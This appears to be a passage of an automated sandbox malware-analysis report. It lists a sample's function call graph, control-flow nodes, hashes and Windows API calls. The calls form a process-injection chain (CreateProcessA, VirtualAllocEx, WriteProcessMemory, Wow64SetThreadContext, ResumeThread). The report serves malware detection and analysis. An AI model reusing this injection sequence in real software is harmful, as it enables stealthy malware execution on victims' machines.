WriteProcessMemory 31543->31545 31546 5d07588 WriteProcessMemory 31543->31546 31544 5d0af84 31544->31461 31545->31544 31546->31544 31548 5d0b0a1 31547->31548 31550 5d06f00 ResumeThread 31548->31550 31551 5d06f08 ResumeThread 31548->31551 31549 5d0b0d1 31549->31461 31550->31549 31551->31549 31556 5d073f0 Wow64SetThreadContext 31552->31556 31557 5d073e8 Wow64SetThreadContext 31552->31557 31553 5d0b2f1 31554 5d0ae77 31554->31553 31558 5d06f00 ResumeThread 31554->31558 31559 5d06f08 ResumeThread 31554->31559 31555 5d0b0d1 31555->31461 31556->31554 31557->31554 31558->31555 31559->31555 31561 5d07572 31560->31561 31561->31560 31562 5d075f6 WriteProcessMemory 31561->31562 31563 5d07627 31562->31563 31563->31487 31565 5d075d0 WriteProcessMemory 31564->31565 31567 5d07627 31565->31567 31567->31487 31569 5d06f08 ResumeThread 31568->31569 31571 5d06f79 31569->31571 31571->31492 31573 5d06f48 ResumeThread 31572->31573 31575 5d06f79 31573->31575 31575->31492 31577 5d07899 CreateProcessA 31576->31577 31579 5d07a5b 31577->31579 31581 5d07810 CreateProcessA 31580->31581 31583 5d07a5b 31581->31583 31585 5d07435 Wow64SetThreadContext 31584->31585 31587 5d0747d 31585->31587 31587->31503 31589 5d07435 Wow64SetThreadContext 31588->31589 31591 5d0747d 31589->31591 31591->31503 31593 5d07678 ReadProcessMemory 31592->31593 31595 5d07707 31593->31595 31595->31516 31597 5d076c3 ReadProcessMemory 31596->31597 31599 5d07707 31597->31599 31599->31516 31601 5d07508 VirtualAllocEx 31600->31601 31603 5d07545 31601->31603 31603->31526 31605 5d07508 VirtualAllocEx 31604->31605 31607 5d07545 31605->31607 31607->31526 31274 dad0dc 31275 dad0f4 31274->31275 31276 dad14e 31275->31276 31281 510847c 31275->31281 31290 51091a8 31275->31290 31294 5109198 31275->31294 31298 5109f08 31275->31298 31284 5108487 31281->31284 31282 5109f79 31323 51085a4 31282->31323 31284->31282 31285 5109f69 31284->31285 31307 510a0a0 31285->31307 31312 510a16c 31285->31312 31318 510a091 31285->31318 31286 5109f77 31291 51091ce 31290->31291 31292 510847c CallWindowProcW 31291->31292 31293 51091ef 31292->31293 31293->31276 31295 51091ce 31294->31295 31296 510847c CallWindowProcW 31295->31296 31297 51091ef 31296->31297 31297->31276 31299 5109f18 31298->31299 31300 5109f79 31299->31300 31302 5109f69 31299->31302 31301 51085a4 CallWindowProcW 31300->31301 31303 5109f77 31301->31303 31304 510a0a0 CallWindowProcW 31302->31304 31305 510a091 CallWindowProcW 31302->31305 31306 510a16c CallWindowProcW 31302->31306 31304->31303 31305->31303 31306->31303 31309 510a0b4 31307->31309 31308 510a140 31308->31286 31327 510a147 31309->31327 31330 510a158 31309->31330 31313 510a12a 31312->31313 31314 510a17a 31312->31314 31316 510a147 CallWindowProcW 31313->31316 31317 510a158 CallWindowProcW 31313->31317 31315 510a140 31315->31286 31316->31315 31317->31315 31320 510a0b4 31318->31320 31319 510a140 31319->31286 31321 510a147 CallWindowProcW 31320->31321 31322 510a158 CallWindowProcW 31320->31322 31321->31319 31322->31319 31324 51085af 31323->31324 31325 510b65a CallWindowProcW 31324->31325 31326 510b609 31324->31326 31325->31326 31326->31286 31328 510a169 31327->31328 31333 510b590 31327->31333 31328->31308 31331 510a169 31330->31331 31332 510b590 CallWindowProcW 31330->31332 31331->31308 31332->31331 31334 51085a4 CallWindowProcW 31333->31334 31335 510b5aa 31334->31335 31335->31328 31420 510e1c8 31421 510e208 31420->31421 31422 510e20d 31421->31422 31424 510ddd8 31421->31424 31422->31422 31425 510dde3 31424->31425 31428 510dfb8 31425->31428 31427 510fdcf 31427->31421 31429 510dfc3 31428->31429 31431 e4dc3c 3 API calls 31429->31431 31430 510fe54 31430->31427 31431->31430 31336 e44a28 31337 e44a31 31336->31337 31338 e44a37 31337->31338 31342 e44b20 31337->31342 31347 e441d0 31338->31347 31340 e44a52 31343 e44b45 31342->31343 31351 e44c20 31343->31351 31355 e44c30 31343->31355 31348 e441db 31347->31348 31363 e46218 31348->31363 31350 e47aae 31350->31340 31353 e44c57 31351->31353 31352 e44d34 31352->31352 31353->31352 31359 e44608 31353->31359 31356 e44c57 31355->31356 31357 e44608 CreateActCtxA 31356->31357 31358 e44d34 31356->31358 31357->31358 31360 e45cc0 CreateActCtxA 31359->31360 31362 e45d83 31360->31362 31364 e46223 31363->31364 31367 e4dbdc 31364->31367 31366 e4eb0d 31366->31350 31368 e4dbe7 31367->31368 31371 e4dc0c 31368->31371 31370 e4ebe2 31370->31366 31372 e4dc17 31371->31372 31375 e4dc3c 31372->31375 31374 e4ece5 31374->31370 31376 e4dc47 31375->31376 31377 e4fd03 31376->31377 31379 5102460 31376->31379 31377->31374 31380 5102470 31379->31380 31384 5102497 31380->31384 31388 5102498 31380->31388 31381 5102476 31381->31377 31392 5102590 31384->31392 31400 510258f 31384->31400 31385 51024a7 31385->31381 31389 51024a7 31388->31389 31390 5102590 2 API calls 31388->31390 31391 510258f 2 API calls 31388->31391 31389->31381 31390->31389 31391->31389 31393 51025c4 31392->31393 31394 51025a1 31392->31394 31393->31385 31394->31393 31408 5102818 31394->31408 31412 5102828 31394->31412 31395 51025bc 31395->31393 31396 51027c8 GetModuleHandleW 31395->31396 31397 51027f5 31396->31397 31397->31385 31401 51025a1 31400->31401 31402 51025c4 31400->31402 31401->31402 31406 5102818 LoadLibraryExW 31401->31406 31407 5102828 LoadLibraryExW 31401->31407 31402->31385 31403 51025bc 31403->31402 31404 51027c8 GetModuleHandleW 31403->31404 31405 51027f5 31404->31405 31405->31385 31406->31403 31407->31403 31409 510283c 31408->31409 31411 5102861 31409->31411 31416 5101f98 31409->31416 31411->31395 31413 510283c 31412->31413 31414 5101f98 LoadLibraryExW 31413->31414 31415 5102861 31413->31415 31414->31415 31415->31395 31417 5102a08 LoadLibraryExW 31416->31417 31419 5102a81 31417->31419 31419->31411

                                              Executed Functions

                                              Function 05D0C9C8 Relevance: .7, Instructions: 673COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c74c208a983941bad501409b8266ecfb503939c3201eaef36f2aa1df45ee81c
                                              • Instruction ID: 7c386bd32a35460f062a5e07d866cb8f121912461ad2e035305ef3c151991a9b
                                              • Opcode Fuzzy Hash: 7c74c208a983941bad501409b8266ecfb503939c3201eaef36f2aa1df45ee81c
                                              • Instruction Fuzzy Hash: FE42AC31B012049FDB14EB68C994BAEB7F6AF88300F14556AE506DB3E1DB74ED42CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D07806 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 685 5d07806-5d078a5 688 5d078a7-5d078b1 685->688 689 5d078de-5d078fe 685->689 688->689 690 5d078b3-5d078b5 688->690 694 5d07900-5d0790a 689->694 695 5d07937-5d07966 689->695 692 5d078b7-5d078c1 690->692 693 5d078d8-5d078db 690->693 696 5d078c3 692->696 697 5d078c5-5d078d4 692->697 693->689 694->695 698 5d0790c-5d0790e 694->698 705 5d07968-5d07972 695->705 706 5d0799f-5d07a59 CreateProcessA 695->706 696->697 697->697 699 5d078d6 697->699 700 5d07910-5d0791a 698->700 701 5d07931-5d07934 698->701 699->693 703 5d0791c 700->703 704 5d0791e-5d0792d 700->704 701->695 703->704 704->704 707 5d0792f 704->707 705->706 708 5d07974-5d07976 705->708 717 5d07a62-5d07ae8 706->717 718 5d07a5b-5d07a61 706->718 707->701 710 5d07978-5d07982 708->710 711 5d07999-5d0799c 708->711 712 5d07984 710->712 713 5d07986-5d07995 710->713 711->706 712->713 713->713 714 5d07997 713->714 714->711 728 5d07af8-5d07afc 717->728 729 5d07aea-5d07aee 717->729 718->717 730 5d07b0c-5d07b10 728->730 731 5d07afe-5d07b02 728->731 729->728 732 5d07af0 729->732 734 5d07b20-5d07b24 730->734 735 5d07b12-5d07b16 730->735 731->730 733 5d07b04 731->733 732->728 733->730 737 5d07b36-5d07b3d 734->737 738 5d07b26-5d07b2c 734->738 735->734 736 5d07b18 735->736 736->734 739 5d07b54 737->739 740 5d07b3f-5d07b4e 737->740 738->737 741 5d07b55 739->741 740->739 741->741
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D07A46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2ead44aa093ebee3171e41b8c351fbc2094243c804588aca513254160c1f1298
                                              • Instruction ID: 45aa12b7457600561233ec6bf54d0a451ffb7f811c1c6b314fec489612189d93
                                              • Opcode Fuzzy Hash: 2ead44aa093ebee3171e41b8c351fbc2094243c804588aca513254160c1f1298
                                              • Instruction Fuzzy Hash: 7CA13A71D00219DFDB20DF68C845BEDBBB2FF48314F1491AAE819AB290D774A985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D07810 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 743 5d07810-5d078a5 745 5d078a7-5d078b1 743->745 746 5d078de-5d078fe 743->746 745->746 747 5d078b3-5d078b5 745->747 751 5d07900-5d0790a 746->751 752 5d07937-5d07966 746->752 749 5d078b7-5d078c1 747->749 750 5d078d8-5d078db 747->750 753 5d078c3 749->753 754 5d078c5-5d078d4 749->754 750->746 751->752 755 5d0790c-5d0790e 751->755 762 5d07968-5d07972 752->762 763 5d0799f-5d07a59 CreateProcessA 752->763 753->754 754->754 756 5d078d6 754->756 757 5d07910-5d0791a 755->757 758 5d07931-5d07934 755->758 756->750 760 5d0791c 757->760 761 5d0791e-5d0792d 757->761 758->752 760->761 761->761 764 5d0792f 761->764 762->763 765 5d07974-5d07976 762->765 774 5d07a62-5d07ae8 763->774 775 5d07a5b-5d07a61 763->775 764->758 767 5d07978-5d07982 765->767 768 5d07999-5d0799c 765->768 769 5d07984 767->769 770 5d07986-5d07995 767->770 768->763 769->770 770->770 771 5d07997 770->771 771->768 785 5d07af8-5d07afc 774->785 786 5d07aea-5d07aee 774->786 775->774 787 5d07b0c-5d07b10 785->787 788 5d07afe-5d07b02 785->788 786->785 789 5d07af0 786->789 791 5d07b20-5d07b24 787->791 792 5d07b12-5d07b16 787->792 788->787 790 5d07b04 788->790 789->785 790->787 794 5d07b36-5d07b3d 791->794 795 5d07b26-5d07b2c 791->795 792->791 793 5d07b18 792->793 793->791 796 5d07b54 794->796 797 5d07b3f-5d07b4e 794->797 795->794 798 5d07b55 796->798 797->796 798->798
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D07A46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 5e8567db94e164e66dd81b4ebb5eef484c15126e36d237fbc7946077a2441b92
                                              • Instruction ID: aa731378673c96ee2e430217b9629693e241d07850312edad56720c0d4051fde
                                              • Opcode Fuzzy Hash: 5e8567db94e164e66dd81b4ebb5eef484c15126e36d237fbc7946077a2441b92
                                              • Instruction Fuzzy Hash: 4B913A71D00219DFDB24DF68C845BADBBB2FF48314F1491AAD819AB280DB74A985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05102590 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 800 5102590-510259f 801 51025a1-51025ae call 5101f34 800->801 802 51025cb-51025cf 800->802 807 51025b0 801->807 808 51025c4 801->808 804 51025d1-51025db 802->804 805 51025e3-5102624 802->805 804->805 811 5102631-510263f 805->811 812 5102626-510262e 805->812 857 51025b6 call 5102818 807->857 858 51025b6 call 5102828 807->858 808->802 813 5102641-5102646 811->813 814 5102663-5102665 811->814 812->811 816 5102651 813->816 817 5102648-510264f call 5101f40 813->817 819 5102668-510266f 814->819 815 51025bc-51025be 815->808 818 5102700-5102766 815->818 821 5102653-5102661 816->821 817->821 849 5102767-5102778 818->849 822 5102671-5102679 819->822 823 510267c-5102683 819->823 821->819 822->823 825 5102690-5102699 call 5101f50 823->825 826 5102685-510268d 823->826 831 51026a6-51026ab 825->831 832 510269b-51026a3 825->832 826->825 833 51026c9-51026cd 831->833 834 51026ad-51026b4 831->834 832->831 859 51026d0 call 5102b27 833->859 860 51026d0 call 5102b28 833->860 834->833 836 51026b6-51026c6 call 5101f60 call 5101f70 834->836 836->833 839 51026d3-51026d6 841 51026d8-51026f6 839->841 842 51026f9-51026ff 839->842 841->842 851 510277a-51027c0 849->851 852 51027c2-51027c5 851->852 853 51027c8-51027f3 GetModuleHandleW 851->853 852->853 854 51027f5-51027fb 853->854 855 51027fc-5102810 853->855 854->855 857->815 858->815 859->839 860->839
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 051027E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f5b824ae729eda9a5f748c76b0e5380ddc79b3a94b7d6c99d4a35b6f80845a0c
                                              • Instruction ID: 44ef3c2bc4200fd61129563d6cb3579303a32b412ee2288c7ff4730ce6ca1665
                                              • Opcode Fuzzy Hash: f5b824ae729eda9a5f748c76b0e5380ddc79b3a94b7d6c99d4a35b6f80845a0c
                                              • Instruction Fuzzy Hash: 11814974A00B058FDB24DF29D548B6ABBF6FF48300F10892DD45AD7A90DB78E949CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05108408 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 861 5108408-5108410 863 5108412-5108436 861->863 864 5108437-5109056 861->864 863->864 869 5109061-5109068 864->869 870 5109058-510905e 864->870 871 5109073-51090ab 869->871 872 510906a-5109070 869->872 870->869 874 51090b3-5109112 CreateWindowExW 871->874 872->871 875 5109114-510911a 874->875 876 510911b-5109153 874->876 875->876 880 5109160 876->880 881 5109155-5109158 876->881 882 5109161 880->882 881->880 882->882
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05109102
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: e1e644692633be4921cfa48494169336a68c713a3881fb3e284a2a98755becf2
                                              • Instruction ID: f466bae728438d46276dfb5324153938e7c64d36d6c29ef83683c261a05753d5
                                              • Opcode Fuzzy Hash: e1e644692633be4921cfa48494169336a68c713a3881fb3e284a2a98755becf2
                                              • Instruction Fuzzy Hash: D35134B1C043599FDB14CFA9C8A4ADEBFB5FF48310F24812AE418AB251D7B49885CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05108450 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 883 5108450-5109056 885 5109061-5109068 883->885 886 5109058-510905e 883->886 887 5109073-5109112 CreateWindowExW 885->887 888 510906a-5109070 885->888 886->885 890 5109114-510911a 887->890 891 510911b-5109153 887->891 888->887 890->891 895 5109160 891->895 896 5109155-5109158 891->896 897 5109161 895->897 896->895 897->897
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05109102
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: f91af2b4e37b3cf0d3d7afa52751dff1745ac2831c5a1f3467cd9cb49ad51841
                                              • Instruction ID: e5a056925d815e62285d94c60397288ebdee0b856899e7844d666d4ee5c6e565
                                              • Opcode Fuzzy Hash: f91af2b4e37b3cf0d3d7afa52751dff1745ac2831c5a1f3467cd9cb49ad51841
                                              • Instruction Fuzzy Hash: A151D0B1D00309DFDB14CF9AC894ADEBBB5FF48310F24812AE819AB255D7B5A845CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05108FE4 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 898 5108fe4-5109056 899 5109061-5109068 898->899 900 5109058-510905e 898->900 901 5109073-51090ab 899->901 902 510906a-5109070 899->902 900->899 903 51090b3-5109112 CreateWindowExW 901->903 902->901 904 5109114-510911a 903->904 905 510911b-5109153 903->905 904->905 909 5109160 905->909 910 5109155-5109158 905->910 911 5109161 909->911 910->909 911->911
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05109102
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 7b37bea33048487967153d9c8323dda0eeb86182dfaa73eb8512bf5740f0140a
                                              • Instruction ID: f02d96e5f8b2915830d41bbd2d777f2ee2f3c62f38ee0206437cf51c769ea7bd
                                              • Opcode Fuzzy Hash: 7b37bea33048487967153d9c8323dda0eeb86182dfaa73eb8512bf5740f0140a
                                              • Instruction Fuzzy Hash: B551CEB1D00309DFDB14CFA9C994ADEFBB5BF48310F24812AE819AB255D7B59885CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00E45E2C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 912 e45e2c-e45e38 913 e45dea 912->913 914 e45e3a-e45e3f 912->914 916 e45dec-e45ded 913->916 917 e45e59-e45e5b 913->917 915 e45eb1-e45ee3 914->915 919 e45def-e45df0 916->919 917->915 920 e45dc4-e45de4 919->920 921 e45df2 919->921 923 e45df3-e45df7 920->923 926 e45de6-e45de9 920->926 921->923 924 e45e08 923->924 925 e45df9-e45e05 923->925 928 e45e09 924->928 925->924 926->923 928->928
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ba88af04c5bcb9b85207ac7f8bdd21075ef412e3e0fcda3cc42bf8f2a86f0d3
                                              • Instruction ID: a5caed3cc7bc1edd03f07038211a14dfa25c4b01f334b64ed0f807771d9d2c8c
                                              • Opcode Fuzzy Hash: 2ba88af04c5bcb9b85207ac7f8bdd21075ef412e3e0fcda3cc42bf8f2a86f0d3
                                              • Instruction Fuzzy Hash: 3F31DD72C04A49CFDB15CBA8D8087EEBBB0FF46319F24418AC044BB256C776A90ACF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00E45CB4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 929 e45cb4-e45d34 931 e45d37-e45d81 CreateActCtxA 929->931 933 e45d83-e45d89 931->933 934 e45d8a-e45de4 931->934 933->934 942 e45de6-e45de9 934->942 943 e45df3-e45df7 934->943 942->943 944 e45e08 943->944 945 e45df9-e45e05 943->945 947 e45e09 944->947 945->944 947->947
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E45D71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 6cd437902fc0a1dff965facbdf53c4437c1fa3b46932d6a89e64430ba833910c
                                              • Instruction ID: b0180b03f4f0b907f8451c29a55ba9df1590c78d4177bc7f22989295ee936a97
                                              • Opcode Fuzzy Hash: 6cd437902fc0a1dff965facbdf53c4437c1fa3b46932d6a89e64430ba833910c
                                              • Instruction Fuzzy Hash: 634101B1C00A19CFDB24DFA9C9447DEBBB1BF49304F20806AC418BB265DB756946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051085A4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 948 51085a4-510b5fc 951 510b602-510b607 948->951 952 510b6ac-510b6cc call 510847c 948->952 954 510b609-510b640 951->954 955 510b65a-510b692 CallWindowProcW 951->955 959 510b6cf-510b6dc 952->959 961 510b642-510b648 954->961 962 510b649-510b658 954->962 956 510b694-510b69a 955->956 957 510b69b-510b6aa 955->957 956->957 957->959 961->962 962->959
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0510B681
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 29f70b31fa84cc1f6ad2eb109dee6ab786eed5ed96ad2892f6911773d79b8f4f
                                              • Instruction ID: 8fc617b7d7026f176b3dc2b3a1a39e5d8e4fb60e8c9bc8af9e7e70d928878cfa
                                              • Opcode Fuzzy Hash: 29f70b31fa84cc1f6ad2eb109dee6ab786eed5ed96ad2892f6911773d79b8f4f
                                              • Instruction Fuzzy Hash: F74127B4904209DFDB14CF99C488AAEBBF6FF88314F24C459D559A7361D374E845CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00E44608 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 965 e44608-e45d81 CreateActCtxA 969 e45d83-e45d89 965->969 970 e45d8a-e45de4 965->970 969->970 978 e45de6-e45de9 970->978 979 e45df3-e45df7 970->979 978->979 980 e45e08 979->980 981 e45df9-e45e05 979->981 983 e45e09 980->983 981->980 983->983
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E45D71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7e8fe0507c16439fdf5a2f3f3f416b5c00c83de49955689cd50577312ba98ec6
                                              • Instruction ID: 55479e9758d60e47d530c23415dd83d7a98528800d84334aa72f5505b79cb6b6
                                              • Opcode Fuzzy Hash: 7e8fe0507c16439fdf5a2f3f3f416b5c00c83de49955689cd50577312ba98ec6
                                              • Instruction Fuzzy Hash: 9241F1B1C00B19CBDB24DFA9C948BDEBBB5BF48304F20806AD408BB255DB756946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D07580 Relevance: 1.6, APIs: 1, Instructions: 80injectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D07618
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a1ed119c5b6c18670a35d704bc68f4fa4ade70dd7018eb5a4ea948afeda16886
                                              • Instruction ID: 98c09e6accca273e95a7b74f87622040eb27d60dd337416b461d6a5231258f14
                                              • Opcode Fuzzy Hash: a1ed119c5b6c18670a35d704bc68f4fa4ade70dd7018eb5a4ea948afeda16886
                                              • Instruction Fuzzy Hash: 7F3168719003499FCB10CFA9C885BDEBFF5FF48310F10842AE919A7290D778A944CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D07588 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D07618
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: eea552dad6059a88a00bff4a7c3b6e55d1b4ff2b6c5abfda2a5169b90daaf657
                                              • Instruction ID: 48403d222e10c3b9e67668b990dd1490a6ef2bdbba9d3648870824cf8bbe6c91
                                              • Opcode Fuzzy Hash: eea552dad6059a88a00bff4a7c3b6e55d1b4ff2b6c5abfda2a5169b90daaf657
                                              • Instruction Fuzzy Hash: BA2139B59003099FCB10DFADC885BEEBBF5FF48310F10842AE919A7240D778A944CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05D07672 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05D076F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 9f4fa32dfd2e8beaea3af43c7301d54281aa6d11c93bc6523ebfd1ea9de8f29a
                                              • Instruction ID: 67c215683c6d3af94b36116d1573a73b3ceefa6e87a5e4967394854245dc4139
                                              • Opcode Fuzzy Hash: 9f4fa32dfd2e8beaea3af43c7301d54281aa6d11c93bc6523ebfd1ea9de8f29a
                                              • Instruction Fuzzy Hash: 312128B18003499FDB10DFAAC885BEEFBF5FF48310F50842AE519A7250D778A945CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051043B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05104A2E,?,?,?,?,?), ref: 05104AEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 3db392b8d27c838db68eb3a6e030b9554d54e0bdad80e3719eff91537a71e8d5
                                              • Instruction ID: cb6dd5f08f0de21ee391bf2f4181b2502c0a580321e59af532da8abc818e43e0
                                              • Opcode Fuzzy Hash: 3db392b8d27c838db68eb3a6e030b9554d54e0bdad80e3719eff91537a71e8d5
